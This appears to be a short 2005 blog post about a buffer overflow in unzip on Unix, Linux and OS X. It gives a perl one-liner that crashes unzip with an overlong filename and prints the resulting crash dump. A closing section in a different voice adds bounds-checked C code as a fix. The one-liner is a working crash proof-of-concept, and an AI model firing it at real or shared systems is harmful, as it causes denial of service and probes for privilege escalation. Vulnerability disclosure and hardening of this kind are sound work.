2005.12.20

Joachim Schipper has discovered an interesting security issue in all versions of unzip on Unix or Linux. The problem is not just the coredump that is generated: the exploit could lead to escalation of privileges. It seems unzip can't handle large files. Don't see what I mean?

Well, imagine a shell on your favorite ISP on Linux or Unix…

Test it yourself:
unzip `perl -e 'print "A" x 50000'`

On OS X you'll get:
Exception: EXC_BAD_ACCESS (0x0001)
Codes: KERN_PROTECTION_FAILURE (0x0002) at 0x0002d000

Thread 0 Crashed:
0 libSystem.B.dylib 0x90002e80 strcpy + 96
1 unzip 0x000145cc 0x1000 + 79308
2 unzip 0x0000e7fc 0x1000 + 55292
3 unzip 0x00003038 0x1000 + 8248
4 unzip 0x0000240c 0x1000 + 5132
5 unzip 0x000022ac 0x1000 + 4780

Thread 0 crashed with PPC Thread State 64:
srr0: 0x0000000090002e80 srr1: 0x000000000000d030 vrsave: 0x0000000000000000
cr: 0x22000022 xer: 0x0000000020000004 lr: 0x00000000000145cc ctr: 0x0000000000000000
r0: 0x0000000000000000 r1: 0x00000000bffe7440 r2: 0x000000000000000a r3: 0x000000000002c1ac
r4: 0x00000000bffe84f8 r5: 0x0000000000000000 r6: 0x00000000fefefeff r7: 0x0000000080808080
r8: 0x0000000041414141 r9: 0x000000000002cffe r10: 0x0000000040404040 r11: 0x0000000048000028
r12: 0x0000000080808080 r13: 0x0000000000000000 r14: 0x0000000000000000 r15: 0x0000000000000000
r16: 0x0000000000000000 r17: 0x0000000000000000 r18: 0x0000000000000000 r19: 0x0000000000000000
r20: 0x0000000000000000 r21: 0x0000000000000000 r22: 0x0000000000020000 r23: 0x0000000000000000
r24: 0x0000000000010eac r25: 0x0000000000020000 r26: 0x0000000000000000 r27: 0x00000000bffe76a2
r28: 0x000000000001b300 r29: 0x0000000000000001 r30: 0x0000000000000000 r31: 0x000000000002b300

Binary Images Description:
0x1000 - 0x1afff unzip /usr/bin/unzip
0x8fe00000 - 0x8fe54fff dyld 44.2 /usr/lib/dyld
0x90000000 - 0x901b3fff libSystem.B.dylib /usr/lib/libSystem.B.dylib
0x9020b000 - 0x9020ffff libmathCommon.A.dylib /usr/lib/system/libmathCommon.A.dylib
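The crash frame in strcpy and the 0x41414141 in r8 point at an unbounded copy of the command-line name into a fixed buffer. As an added illustration (not code from this page or from unzip itself), here is the bounds-checked form of that copy; the buffer size NAME_BUF, the helper names and the constructed 50000-byte name are assumptions.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Fixed-size name buffer (assumed size; unzip's real buffer size is not on the page). */
#define NAME_BUF 1024

/* The pattern behind a "strcpy + 96" frame is an unbounded copy of argv[i] into a
 * fixed buffer: strcpy(name, argv[i]). This hardened copy measures first and refuses
 * names that do not fit rather than truncating them. Returns 0 on success, -1 on overflow. */
static int copy_name_checked(char *dst, size_t dstsize, const char *src)
{
    size_t n = strlen(src);
    if (n >= dstsize) return -1;
    memcpy(dst, src, n + 1); /* includes the terminating NUL */
    return 0;
}

/* Validate every argument before it is used as a path; returns how many were rejected. */
static int check_args(int argc, char *argv[])
{
    char name[NAME_BUF];
    int rejected = 0;
    for (int i = 1; i < argc; i++) {
        if (copy_name_checked(name, sizeof name, argv[i]) != 0) {
            fprintf(stderr, "arg %d: name too long (%zu bytes, limit %zu)\n",
                    i, strlen(argv[i]), sizeof name - 1);
            rejected++;
        }
    }
    return rejected;
}

/* Constructed input: a run of 'A's like the page's perl one-liner. Caller frees. */
static char *make_long_name(size_t len)
{
    char *s = malloc(len + 1);
    if (s == NULL) abort();
    memset(s, 'A', len);
    s[len] = '\0';
    return s;
}
int main(void)
{
    char *big = make_long_name(50000);
    char *args[] = { "unzip", big, NULL };
    int bad = check_args(2, args); /* the 50000-byte name is rejected: bad == 1 */
    free(big);
    return bad ? 1 : 0;
}
```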
